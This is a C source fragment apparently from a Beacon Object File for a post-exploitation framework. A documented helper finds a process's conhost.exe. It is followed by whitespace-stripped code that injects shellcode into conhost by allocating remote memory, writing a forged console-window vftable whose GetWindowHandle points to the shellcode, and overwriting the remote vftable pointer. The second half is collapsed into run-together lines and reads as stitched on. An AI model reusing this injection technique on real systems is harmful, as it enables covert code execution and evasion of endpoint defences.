/*
 * GetConhostId - locate the conhost.exe that was spawned for a given process.
 *
 * Takes a Toolhelp process snapshot and walks it, returning the PID of the
 * first entry whose image name is "conhost.exe" (compared case-insensitively)
 * and whose parent PID equals dwPPid.
 *
 * dwPPid:  PID of the console-owning process whose conhost is wanted.
 * Returns: the matching conhost PID, or 0 when the snapshot could not be
 *          created, the walk could not be started, or no entry matched.
 *
 * Caveats for callers: the snapshot is a point-in-time view, so the PID can
 * be stale (exited or reused) by the time it is opened. Only the image name
 * is compared - szExeFile carries no path - so any process that happens to
 * be named conhost.exe with the right parent would also match.
 */
DWORD GetConhostId(DWORD dwPPid)
{
    DWORD dwConhostPid = 0;
    PROCESSENTRY32 entry;

    HANDLE hSnapshot = KERNEL32$CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (INVALID_HANDLE_VALUE == hSnapshot) {
        // No handle was handed out, so there is nothing to release.
        return dwConhostPid;
    }

    // The project's zeroing helper is used here as in the rest of the file;
    // NOTE(review): presumably to avoid an implicit memset import from a
    // `= {0}` initializer, which a BOF loader would not resolve - confirm.
    intZeroMemory(&entry, sizeof(entry));
    // Toolhelp rejects the walk unless dwSize is populated beforehand.
    entry.dwSize = sizeof(PROCESSENTRY32);

    // Process32First primes the walk; Process32Next advances it. Either
    // returning FALSE ends the loop with dwConhostPid still 0.
    for (int bHaveEntry = KERNEL32$Process32First(hSnapshot, &entry);
         bHaveEntry;
         bHaveEntry = KERNEL32$Process32Next(hSnapshot, &entry)) {
        if (0 == MSVCRT$_stricmp("conhost.exe", entry.szExeFile) &&
            dwPPid == entry.th32ParentProcessID) {
            // First conhost child of dwPPid wins; later ones are ignored.
            dwConhostPid = entry.th32ProcessID;
            break;
        }
    }

    KERNEL32$CloseHandle(hSnapshot);
    return dwConhostPid;
}
// Update the local vftable to point to the shellcodeconsoleWindow.GetWindowHandle = (ULONG_PTR)lpRemoteShellcodeBuffer;// Allocate a remote buffer for the new vftableRegionSize =sizeof(consoleWindow) +1;dwErrorCode =NtAllocateVirtualMemory(lpProcessInfo->hProcess,&lpRemoteVTableBuffer,0,&RegionSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);if (STATUS_SUCCESS != dwErrorCode){internal_printf("NtAllocateVirtualMemory failed (%lu)\n", dwErrorCode);goto end;}// Write the local vftable to the remote bufferdwErrorCode =NtWriteVirtualMemory(lpProcessInfo->hProcess, lpRemoteVTableBuffer,&consoleWindow,sizeof(consoleWindow),&RegionSize);if ( STATUS_SUCCESS != dwErrorCode ){internal_printf("NtWriteVirtualMemory failed (%lu)\n", dwErrorCode);goto end;}// Update the remote vftable pointer to point to the new remote vftabledwErrorCode =NtWriteVirtualMemory(lpProcessInfo->hProcess, lpUserData,&lpRemoteVTableBuffer,sizeof(ULONG_PTR),&RegionSize);if ( STATUS_SUCCESS != dwErrorCode ){internal_printf("NtWriteVirtualMemory failed (%lu)\n", dwErrorCode);goto end;}